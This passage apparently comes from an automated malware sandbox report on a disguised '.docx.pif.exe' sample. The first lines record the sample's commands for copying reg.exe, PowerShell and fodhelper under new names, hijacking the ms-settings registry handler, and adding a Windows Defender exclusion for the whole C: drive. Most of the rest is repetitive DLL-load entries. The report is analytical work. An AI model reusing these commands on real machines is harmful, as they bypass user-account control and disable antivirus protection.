              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: aclui.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: url.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: nltdll.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: nltdll.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
